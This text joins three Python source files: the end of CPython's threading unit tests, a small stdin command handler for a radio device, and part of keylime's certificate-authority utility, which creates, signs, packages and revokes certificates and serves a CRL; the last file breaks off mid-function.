t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@test.support.cpython_only
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
@cpython_only
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
InputHandlerThread.py
|
from Queue import Queue, Empty
from threading import Thread
import sys
import time
class InputHandlerThread(Thread):
def __init__(self, device):
Thread.__init__(self)
self.queue = Queue()
self.device = device
self.daemon = True
t = Thread(target=self.enqueue_input, args=(sys.stdin, self.queue,))
t.daemon = True # thread dies with the program
t.start()
def enqueue_input(self, inp, queue):
for line in iter(inp.readline, b''):
queue.put(line)
inp.close()
def read_input(self):
result = []
while True:
try:
result.append(self.queue.get_nowait())
except Empty:
break
result = b"".join(result)
return result.decode("utf-8")
def run(self):
while True:
i = self.read_input()
if len(i) > 0:
if i.startswith("SR:"):
try:
v = float(i.replace("SR:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_samp_rate(v)
elif i.startswith("G:"):
try:
v = int(i.replace("G:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_gain(v)
elif i.startswith("BW:"):
try:
v = float(i.replace("BW:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_bw(v)
elif i.startswith("F:"):
try:
v = float(i.replace("F:", "").split(" ")[-1])
except ValueError:
v = 1
self.device.set_freq(v)
time.sleep(0.1)
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage ;
# Create a temporary CA cert and it's private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception(f"Unknown CA implementation: {config.CA_IMPL}")
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open(f'{name}-cert.crt', 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open(f"{name}-private.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open(f"{name}-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path(f'{name}-cert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info("Created certificate for name %s successfully in %s", name, workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info("CA certificate created successfully in %s", workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile(f'{name}-pkg.zip', 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip",
name, name)
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info("No CRL distribution points in %s", cert_path)
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s",
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d",
socket.getfqdn(), config.CRL_PORT)
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in1hour:
logger.info(
"Certificate to expire soon %s, re-issuing", expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s", revocation)
return
logger.info("Revoking certificate: %s", serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from %s with uri: %s', str(self.client_address), self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
